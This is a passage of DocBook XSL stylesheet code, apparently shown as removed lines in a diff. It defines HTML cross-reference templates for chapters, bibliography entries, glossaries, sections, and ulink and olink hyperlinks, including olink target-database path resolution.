<xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="cmdsynopsis" mode="xref-to"> - <xsl:apply-templates select="(.//command)[1]" mode="xref"/> -</xsl:template> - -<xsl:template match="funcsynopsis" mode="xref-to"> - <xsl:apply-templates select="(.//function)[1]" mode="xref"/> -</xsl:template> - -<xsl:template match="dedication|preface|chapter|appendix|article" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="bibliography" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="biblioentry|bibliomixed" mode="xref-to-prefix"> - <xsl:text>[</xsl:text> -</xsl:template> - -<xsl:template match="biblioentry|bibliomixed" mode="xref-to-suffix"> - <xsl:text>]</xsl:text> -</xsl:template> - -<xsl:template match="biblioentry|bibliomixed" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <!-- handles both biblioentry and bibliomixed --> - <xsl:choose> - <xsl:when test="string(.) = ''"> - <xsl:variable name="bib" select="document($bibliography.collection,.)"/> - <xsl:variable name="id" select="@id"/> - <xsl:variable name="entry" select="$bib/bibliography/*[@id=$id][1]"/> - <xsl:choose> - <xsl:when test="$entry"> - <xsl:choose> - <xsl:when test="$bibliography.numbered != 0"> - <xsl:number from="bibliography" count="biblioentry|bibliomixed" - level="any" format="1"/> - </xsl:when> - <xsl:when test="local-name($entry/*[1]) = 'abbrev'"> - <xsl:apply-templates select="$entry/*[1]"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="@id"/> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - <xsl:otherwise> - <xsl:message> - <xsl:text>No bibliography entry: </xsl:text> - <xsl:value-of select="$id"/> - <xsl:text> found in </xsl:text> - <xsl:value-of select="$bibliography.collection"/> - </xsl:message> - <xsl:value-of select="@id"/> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - <xsl:otherwise> - <xsl:choose> - <xsl:when test="$bibliography.numbered != 0"> - <xsl:number from="bibliography" count="biblioentry|bibliomixed" - level="any" format="1"/> - </xsl:when> - <xsl:when test="local-name(*[1]) = 'abbrev'"> - <xsl:apply-templates select="*[1]"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="@id"/> - </xsl:otherwise> - </xsl:choose> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="glossary" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="glossentry" mode="xref-to"> - <xsl:choose> - <xsl:when test="$glossentry.show.acronym = 'primary'"> - <xsl:choose> - <xsl:when test="acronym|abbrev"> - <xsl:apply-templates select="(acronym|abbrev)[1]"/> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates select="glossterm[1]" mode="xref-to"/> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates select="glossterm[1]" mode="xref-to"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="glossterm" mode="xref-to"> - <xsl:apply-templates/> -</xsl:template> - -<xsl:template match="index" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="listitem" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="section|simplesect - |sect1|sect2|sect3|sect4|sect5 - |refsect1|refsect2|refsect3|refsection" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> - <!-- FIXME: What about "in Chapter X"? --> -</xsl:template> - -<xsl:template match="bridgehead" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> - <!-- FIXME: What about "in Chapter X"? --> -</xsl:template> - -<xsl:template match="qandaset" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="qandadiv" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="qandaentry" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="question[1]" mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="question|answer" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="part|reference" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="refentry" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:choose> - <xsl:when test="refmeta/refentrytitle"> - <xsl:apply-templates select="refmeta/refentrytitle"/> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates select="refnamediv/refname[1]"/> - </xsl:otherwise> - </xsl:choose> - <xsl:apply-templates select="refmeta/manvolnum"/> -</xsl:template> - -<xsl:template match="refnamediv" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="refname[1]" mode="xref-to"> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="refname" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates mode="xref-to"/> -</xsl:template> - -<xsl:template match="step" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:call-template name="gentext"> - <xsl:with-param name="key" select="'Step'"/> - </xsl:call-template> - <xsl:text> </xsl:text> - <xsl:apply-templates select="." mode="number"/> -</xsl:template> - -<xsl:template match="varlistentry" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="term[1]" mode="xref-to"> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="varlistentry/term" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <!-- to avoid the comma that will be generated if there are several terms --> - <xsl:apply-templates/> -</xsl:template> - -<xsl:template match="co" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="callout-bug"/> -</xsl:template> - -<xsl:template match="book" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> -</xsl:template> - -<xsl:template match="para" mode="xref-to"> - <xsl:param name="referrer"/> - <xsl:param name="xrefstyle"/> - - <xsl:variable name="context" select="(ancestor::simplesect - |ancestor::section - |ancestor::sect1 - |ancestor::sect2 - |ancestor::sect3 - |ancestor::sect4 - |ancestor::sect5 - |ancestor::refsection - |ancestor::refsect1 - |ancestor::refsect2 - |ancestor::refsect3 - |ancestor::chapter - |ancestor::appendix - |ancestor::preface - |ancestor::partintro - |ancestor::dedication - |ancestor::colophon - |ancestor::bibliography - |ancestor::index - |ancestor::glossary - |ancestor::glossentry - |ancestor::listitem - |ancestor::varlistentry)[last()]"/> - - <xsl:apply-templates select="$context" mode="xref-to"/> -<!-- - <xsl:apply-templates select="." mode="object.xref.markup"> - <xsl:with-param name="purpose" select="'xref'"/> - <xsl:with-param name="xrefstyle" select="$xrefstyle"/> - <xsl:with-param name="referrer" select="$referrer"/> - </xsl:apply-templates> ---> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="*" mode="xref-title"> - <xsl:variable name="title"> - <xsl:apply-templates select="." mode="object.title.markup"/> - </xsl:variable> - - <xsl:value-of select="$title"/> -</xsl:template> - -<xsl:template match="author" mode="xref-title"> - <xsl:variable name="title"> - <xsl:call-template name="person.name"/> - </xsl:variable> - - <xsl:value-of select="$title"/> -</xsl:template> - -<xsl:template match="authorgroup" mode="xref-title"> - <xsl:variable name="title"> - <xsl:call-template name="person.name.list"/> - </xsl:variable> - - <xsl:value-of select="$title"/> -</xsl:template> - -<xsl:template match="cmdsynopsis" mode="xref-title"> - <xsl:variable name="title"> - <xsl:apply-templates select="(.//command)[1]" mode="xref"/> - </xsl:variable> - - <xsl:value-of select="$title"/> -</xsl:template> - -<xsl:template match="funcsynopsis" mode="xref-title"> - <xsl:variable name="title"> - <xsl:apply-templates select="(.//function)[1]" mode="xref"/> - </xsl:variable> - - <xsl:value-of select="$title"/> -</xsl:template> - -<xsl:template match="biblioentry|bibliomixed" mode="xref-title"> - <!-- handles both biblioentry and bibliomixed --> - <xsl:variable name="title"> - <xsl:text>[</xsl:text> - <xsl:choose> - <xsl:when test="local-name(*[1]) = 'abbrev'"> - <xsl:apply-templates select="*[1]"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="@id"/> - </xsl:otherwise> - </xsl:choose> - <xsl:text>]</xsl:text> - </xsl:variable> - - <xsl:value-of select="$title"/> -</xsl:template> - -<xsl:template match="step" mode="xref-title"> - <xsl:call-template name="gentext"> - <xsl:with-param name="key" select="'Step'"/> - </xsl:call-template> - <xsl:text> </xsl:text> - <xsl:apply-templates select="." mode="number"/> -</xsl:template> - -<xsl:template match="co" mode="xref-title"> - <xsl:variable name="title"> - <xsl:apply-templates select="." mode="callout-bug"/> - </xsl:variable> - - <xsl:value-of select="$title"/> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="link" name="link"> - <xsl:param name="a.target"/> - - <xsl:variable name="targets" select="key('id',@linkend)"/> - <xsl:variable name="target" select="$targets[1]"/> - - <xsl:call-template name="check.id.unique"> - <xsl:with-param name="linkend" select="@linkend"/> - </xsl:call-template> - - <a> - <xsl:if test="@id"> - <xsl:attribute name="name"><xsl:value-of select="@id"/></xsl:attribute> - </xsl:if> - - <xsl:if test="$a.target"> - <xsl:attribute name="target"><xsl:value-of select="$a.target"/></xsl:attribute> - </xsl:if> - - <xsl:attribute name="href"> - <xsl:call-template name="href.target"> - <xsl:with-param name="object" select="$target"/> - </xsl:call-template> - </xsl:attribute> - - <!-- FIXME: is there a better way to tell what elements have a title? --> - <xsl:if test="local-name($target) = 'book' - or local-name($target) = 'set' - or local-name($target) = 'chapter' - or local-name($target) = 'preface' - or local-name($target) = 'appendix' - or local-name($target) = 'bibliography' - or local-name($target) = 'glossary' - or local-name($target) = 'index' - or local-name($target) = 'part' - or local-name($target) = 'refentry' - or local-name($target) = 'reference' - or local-name($target) = 'example' - or local-name($target) = 'equation' - or local-name($target) = 'table' - or local-name($target) = 'figure' - or local-name($target) = 'simplesect' - or starts-with(local-name($target),'sect') - or starts-with(local-name($target),'refsect')"> - <xsl:attribute name="title"> - <xsl:apply-templates select="$target" - mode="object.title.markup.textonly"/> - </xsl:attribute> - </xsl:if> - - <xsl:choose> - <xsl:when test="count(child::node()) > 0"> - <!-- If it has content, use it --> - <xsl:apply-templates/> - </xsl:when> - <xsl:otherwise> - <!-- else look for an endterm --> - <xsl:choose> - <xsl:when test="@endterm"> - <xsl:variable name="etargets" select="key('id',@endterm)"/> - <xsl:variable name="etarget" select="$etargets[1]"/> - <xsl:choose> - <xsl:when test="count($etarget) = 0"> - <xsl:message> - <xsl:value-of select="count($etargets)"/> - <xsl:text>Endterm points to nonexistent ID: </xsl:text> - <xsl:value-of select="@endterm"/> - </xsl:message> - <xsl:text>???</xsl:text> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates select="$etarget" mode="endterm"/> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - - <xsl:otherwise> - <xsl:message> - <xsl:text>Link element has no content and no Endterm. </xsl:text> - <xsl:text>Nothing to show in the link to </xsl:text> - <xsl:value-of select="$target"/> - </xsl:message> - <xsl:text>???</xsl:text> - </xsl:otherwise> - </xsl:choose> - </xsl:otherwise> - </xsl:choose> - </a> -</xsl:template> - -<xsl:template match="ulink" name="ulink"> - <xsl:variable name="link"> - <a> - <xsl:if test="@id"> - <xsl:attribute name="name"> - <xsl:value-of select="@id"/> - </xsl:attribute> - </xsl:if> - <xsl:attribute name="href"><xsl:value-of select="@url"/></xsl:attribute> - <xsl:if test="$ulink.target != ''"> - <xsl:attribute name="target"> - <xsl:value-of select="$ulink.target"/> - </xsl:attribute> - </xsl:if> - <xsl:choose> - <xsl:when test="count(child::node())=0"> - <xsl:value-of select="@url"/> - </xsl:when> - <xsl:otherwise> - <xsl:apply-templates/> - </xsl:otherwise> - </xsl:choose> - </a> - </xsl:variable> - - <xsl:choose> - <xsl:when test="function-available('suwl:unwrapLinks')"> - <xsl:copy-of select="suwl:unwrapLinks($link)"/> - </xsl:when> - <xsl:otherwise> - <xsl:copy-of select="$link"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="olink" name="olink"> - <xsl:param name="target.database" - select="document($target.database.document, /)"/> - - <xsl:call-template name="anchor"/> - - <xsl:variable name="localinfo" select="@localinfo"/> - - <xsl:variable name="href"> - <xsl:choose> - <xsl:when test="@linkmode"> - <!-- use the linkmode to get the base URI, use localinfo as fragid --> - <xsl:variable name="modespec" select="key('id',@linkmode)"/> - <xsl:if test="count($modespec) != 1 - or local-name($modespec) != 'modespec'"> - <xsl:message>Warning: olink linkmode pointer is wrong.</xsl:message> - </xsl:if> - <xsl:value-of select="$modespec"/> - <xsl:if test="@localinfo"> - <xsl:text>#</xsl:text> - <xsl:value-of select="@localinfo"/> - </xsl:if> - </xsl:when> - <xsl:when test="@type = 'href'"> - <xsl:call-template name="olink.outline"> - <xsl:with-param name="outline.base.uri" - select="unparsed-entity-uri(@targetdocent)"/> - <xsl:with-param name="localinfo" select="@localinfo"/> - <xsl:with-param name="return" select="'href'"/> - </xsl:call-template> - </xsl:when> - <!-- Olinks resolved by stylesheet and target database --> - <xsl:when test="@targetdoc and not(@targetptr)" > - <xsl:message>Olink missing @targetptr attribute value</xsl:message> - </xsl:when> - <xsl:when test="not(@targetdoc) and @targetptr" > - <xsl:message>Olink missing @targetdoc attribute value</xsl:message> - </xsl:when> - <xsl:when test="@targetdoc and @targetptr"> - <xsl:variable name="seek.targetdoc" select="@targetdoc"/> - <xsl:variable name="seek.targetptr" select="@targetptr"/> - <xsl:variable name="targetdoc.key" > - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetdoc-key', $seek.targetdoc)/@targetdoc" /> - </xsl:for-each> - </xsl:variable> - <xsl:variable name="targetptr.key" > - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetptr-key', concat($seek.targetdoc, '/', $seek.targetptr))/@targetptr" /> - </xsl:for-each> - </xsl:variable> -<!-- debug -<xsl:message>seek.targetdoc is <xsl:value-of select="$seek.targetdoc"/></xsl:message> -<xsl:message>seek.targetptr is <xsl:value-of select="$seek.targetptr"/></xsl:message> ---> - <xsl:choose> - <!-- Was the database document parameter not set? --> - <xsl:when test="$target.database.document = ''"> - <xsl:message> - <xsl:text>Olinks not processed: must specify a $target.database.document parameter - </xsl:text> - <xsl:text>when using olinks with targetdoc and targetptr attributes.</xsl:text> - </xsl:message> - </xsl:when> - <!-- Did it not open? Should be a targetset element --> - <xsl:when test="not($target.database/targetset)"> - <xsl:message>Olink error: could not open target database <xsl:value-of select="$target.database.document"/>. </xsl:message> - </xsl:when> - <!-- Does it not have this document id? --> - <xsl:when test="$targetdoc.key = ''" > - <xsl:message>Olink error: document id <xsl:value-of select="$seek.targetdoc"/> not in target database.</xsl:message> - </xsl:when> - - <!-- Does this document not have this targetptr? --> - <xsl:when test="$targetptr.key = ''" > - <!-- Does this document have *any* content? --> - <xsl:variable name="document.root"> - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetdoc-key', $seek.targetdoc)/div/@element"/> - </xsl:for-each> - </xsl:variable> - <xsl:choose> - <xsl:when test="$document.root = ''"> - <xsl:message>Olink error: could not open data file for document id '<xsl:value-of select="$seek.targetdoc"/>'.</xsl:message> - </xsl:when> - <xsl:otherwise> - <xsl:message>Olink error: targetptr <xsl:value-of select="$seek.targetptr"/> not found in document id <xsl:value-of select="$seek.targetdoc"/>.</xsl:message> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - - <!-- Proceed with good olink syntax --> - <xsl:otherwise> - - <!-- Does the target database use a sitemap? --> - <xsl:variable name="use.sitemap"> - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetdoc-key', $seek.targetdoc)/parent::dir/@name"/> - </xsl:for-each> - </xsl:variable> - <xsl:variable name="target.href" > - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetptr-key', concat($seek.targetdoc, '/', $seek.targetptr))/@href" /> - - </xsl:for-each> - </xsl:variable> - - <!-- Get the baseuri for this targetptr --> - - <xsl:variable name="baseuri" > - <xsl:choose> - <!-- Does the database use a sitemap? --> - <xsl:when test="$use.sitemap != ''" > - <xsl:choose> - <!-- Was current.docid parameter set? --> - <xsl:when test="$current.docid != ''"> - <xsl:for-each select="$target.database" > - <xsl:call-template name="targetpath" > - <xsl:with-param name="dirnode" select="key('targetdoc-key', $current.docid)/parent::dir"/> - <xsl:with-param name="targetdoc" select="$seek.targetdoc"/> - </xsl:call-template> - </xsl:for-each > - </xsl:when> - <xsl:otherwise> - <xsl:message>Olink warning: cannot compute relative sitemap path without $current.docid parameter</xsl:message> - </xsl:otherwise> - </xsl:choose> - <!-- In either case, add baseuri from its document entry--> - <xsl:variable name="docbaseuri"> - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetdoc-key', $seek.targetdoc)/@baseuri" /> - </xsl:for-each> - </xsl:variable> - <xsl:if test="$docbaseuri != ''" > - <xsl:value-of select="$docbaseuri"/> - </xsl:if> - </xsl:when> - <!-- No database sitemap in use --> - <xsl:otherwise> - <!-- Just use any baseuri from its document entry --> - <xsl:variable name="docbaseuri"> - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetdoc-key', $seek.targetdoc)/@baseuri" /> - </xsl:for-each> - </xsl:variable> - <xsl:if test="$docbaseuri != ''" > - <xsl:value-of select="$docbaseuri"/> - </xsl:if> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <!-- Form the href information --> - <xsl:if test="$baseuri != ''"> - <xsl:value-of select="$baseuri"/> - <xsl:if test="substring($target.href,1,1) != '#'"> - <!--xsl:text>/</xsl:text--> - </xsl:if> - </xsl:if> - <xsl:value-of select="$target.href"/> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$olink.resolver"/> - <xsl:text>?</xsl:text> - <xsl:value-of select="$olink.sysid"/> - <xsl:value-of select="unparsed-entity-uri(@targetdocent)"/> - <!-- XSL gives no access to the public identifier (grumble...) --> - <xsl:if test="@localinfo"> - <xsl:text>&</xsl:text> - <xsl:value-of select="$olink.fragid"/> - <xsl:value-of select="@localinfo"/> - </xsl:if> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$href != ''"> - <a href="{$href}"> - <xsl:call-template name="olink.hottext"> - <xsl:with-param name="target.database" select="$target.database"/> - </xsl:call-template> - </a> - </xsl:when> - <xsl:otherwise> - <xsl:call-template name="olink.hottext"> - <xsl:with-param name="target.database" select="$target.database"/> - </xsl:call-template> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template name="olink.outline"> - <xsl:param name="outline.base.uri"/> - <xsl:param name="localinfo"/> - <xsl:param name="return" select="href"/> - - <xsl:variable name="outline-file" - select="concat($outline.base.uri, - $olink.outline.ext)"/> - - <xsl:variable name="outline" select="document($outline-file,.)/div"/> - - <xsl:variable name="node-href"> - <xsl:choose> - <xsl:when test="$localinfo != ''"> - <xsl:variable name="node" select="$outline//*[@id=$localinfo]"/> - <xsl:value-of select="$node/@href"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$outline/@href"/> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:variable name="node-xref"> - <xsl:choose> - <xsl:when test="$localinfo != ''"> - <xsl:variable name="node" select="$outline//*[@id=$localinfo]"/> - <xsl:copy-of select="$node/xref"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="$outline/xref"/> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - - <xsl:choose> - <xsl:when test="$return = 'href'"> - <xsl:value-of select="$node-href"/> - </xsl:when> - <xsl:when test="$return = 'xref'"> - <xsl:value-of select="$node-xref"/> - </xsl:when> - <xsl:otherwise> - <xsl:copy-of select="$node-xref"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template name="olink.hottext"> - <xsl:param name="target.database"/> - <xsl:choose> - <!-- If it has elements or text (not just PI or comment) --> - <xsl:when test="child::text() or child::*"> - <xsl:apply-templates/> - </xsl:when> - <xsl:when test="@targetdoc and @targetptr"> - <!-- Get the xref text for this record --> - <xsl:variable name="seek.targetdoc" select="@targetdoc"/> - <xsl:variable name="seek.targetptr" select="@targetptr"/> - <xsl:variable name="xref.text" > - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetptr-key', concat($seek.targetdoc, '/', $seek.targetptr))/xreftext" /> - - </xsl:for-each> - </xsl:variable> - - - <xsl:choose> - <xsl:when test="$use.local.olink.style != 0"> - <!-- Get the element name and lang for this targetptr --> - <xsl:variable name="element" > - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetptr-key', concat($seek.targetdoc, '/', $seek.targetptr))/@element" /> - </xsl:for-each> - </xsl:variable> - - <xsl:variable name="lang"> - <xsl:variable name="candidate"> - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetptr-key', concat($seek.targetdoc, '/', $seek.targetptr))/@lang" /> - </xsl:for-each> - </xsl:variable> - <xsl:choose> - <xsl:when test="$candidate != ''"> - <xsl:value-of select="$candidate"/> - </xsl:when> - <xsl:otherwise> - <xsl:value-of select="'en'"/> - </xsl:otherwise> - </xsl:choose> - </xsl:variable> - <xsl:variable name="template"> - <xsl:call-template name="gentext.template"> - <xsl:with-param name="context" select="'title'"/> - <xsl:with-param name="name" select="$element"/> - <xsl:with-param name="lang" select="$lang"/> - </xsl:call-template> - </xsl:variable> - <xsl:call-template name="substitute-markup"> - <xsl:with-param name="template" select="$template"/> - <xsl:with-param name="title"> - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetptr-key', concat($seek.targetdoc, '/', $seek.targetptr))/ttl" /> - </xsl:for-each> - </xsl:with-param> - <xsl:with-param name="label"> - <xsl:for-each select="$target.database" > - <xsl:value-of select="key('targetptr-key', concat($seek.targetdoc, '/', $seek.targetptr))/@number" /> - </xsl:for-each> - </xsl:with-param> - </xsl:call-template> - </xsl:when> - <xsl:when test="$xref.text !=''"> - <xsl:value-of select="$xref.text"/> - </xsl:when> - <xsl:otherwise> - <xsl:message>Olink error: no generated text for targetdoc/targetptr = <xsl:value-of select="@targetdoc"/>/<xsl:value-of select="@targetptr"/></xsl:message> - <xsl:text>????</xsl:text> - </xsl:otherwise> - </xsl:choose> - </xsl:when> - <xsl:otherwise> - <xsl:call-template name="olink.outline"> - <xsl:with-param name="outline.base.uri" - select="unparsed-entity-uri(@targetdocent)"/> - <xsl:with-param name="localinfo" select="@localinfo"/> - <xsl:with-param name="return" select="'xreftext'"/> - </xsl:call-template> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template name="targetpath"> - <xsl:param name="dirnode" /> - <xsl:param name="targetdoc" select="''"/> - -<!-- -<xsl:message>dirnode is <xsl:value-of select="$dirnode/@name"/></xsl:message> -<xsl:message>targetdoc is <xsl:value-of select="$targetdoc"/></xsl:message> ---> - <!-- recursive template generates path to olink target directory --> - <xsl:choose> - <!-- Have we arrived at the final path step? --> - <xsl:when test="$dirnode/child::document[@targetdoc = $targetdoc]"> - <!-- We are done --> - </xsl:when> - <!-- Have we reached the top without a match? --> - <xsl:when test="name($dirnode) != 'dir'" > - <xsl:message>Olink error: cannot locate targetdoc <xsl:value-of select="$targetdoc"/> in sitemap</xsl:message> - </xsl:when> - <!-- Is the target in a descendant? --> - <xsl:when test="$dirnode/descendant::document/@targetdoc = $targetdoc"> - <xsl:variable name="step" select="$dirnode/child::dir[descendant::document/@targetdoc = $targetdoc]"/> - <xsl:if test = "$step"> - <xsl:value-of select="$step/@name"/> - <xsl:text>/</xsl:text> - </xsl:if> - <!-- Now recurse with the child --> - <xsl:call-template name="targetpath" > - <xsl:with-param name="dirnode" select="$step"/> - <xsl:with-param name="targetdoc" select="$targetdoc"/> - </xsl:call-template> - </xsl:when> - <!-- Otherwise we need to move up a step --> - <xsl:otherwise> - <xsl:if test="$dirnode/parent::dir"> - <xsl:text>../</xsl:text> - </xsl:if> - <xsl:call-template name="targetpath" > - <xsl:with-param name="dirnode" select="$dirnode/parent::*"/> - <xsl:with-param name="targetdoc" select="$targetdoc"/> - </xsl:call-template> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template name="xref.xreflabel"> - <!-- called to process an xreflabel...you might use this to make --> - <!-- xreflabels come out in the right font for different targets, --> - <!-- for example. --> - <xsl:param name="target" select="."/> - <xsl:value-of select="$target/@xreflabel"/> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="title" mode="xref"> - <xsl:apply-templates/> -</xsl:template> - -<xsl:template match="command" mode="xref"> - <xsl:call-template name="inline.boldseq"/> -</xsl:template> - -<xsl:template match="function" mode="xref"> - <xsl:call-template name="inline.monoseq"/> -</xsl:template> - -<xsl:template match="*" mode="pagenumber.markup"> - <xsl:message> - <xsl:text>Page numbers make no sense in HTML! (Don't use %p in templates)</xsl:text> - </xsl:message> -</xsl:template> - -<!-- ==================================================================== --> - -<xsl:template match="*" mode="insert.title.markup"> - <xsl:param name="purpose"/> - <xsl:param name="xrefstyle"/> - <xsl:param name="title"/> - - <xsl:choose> - <!-- FIXME: what about the case where titleabbrev is inside the info? --> - <xsl:when test="$purpose = 'xref' and titleabbrev"> - <xsl:apply-templates select="." mode="titleabbrev.markup"/> - </xsl:when> - <xsl:otherwise> - <xsl:copy-of select="$title"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="chapter|appendix" mode="insert.title.markup"> - <xsl:param name="purpose"/> - <xsl:param name="xrefstyle"/> - <xsl:param name="title"/> - - <xsl:choose> - <xsl:when test="$purpose = 'xref'"> - <i> - <xsl:copy-of select="$title"/> - </i> - </xsl:when> - <xsl:otherwise> - <xsl:copy-of select="$title"/> - </xsl:otherwise> - </xsl:choose> -</xsl:template> - -<xsl:template match="*" mode="insert.subtitle.markup"> - <xsl:param name="purpose"/> - <xsl:param name="xrefstyle"/> - <xsl:param name="subtitle"/> - - <xsl:copy-of select="$subtitle"/> -</xsl:template> - 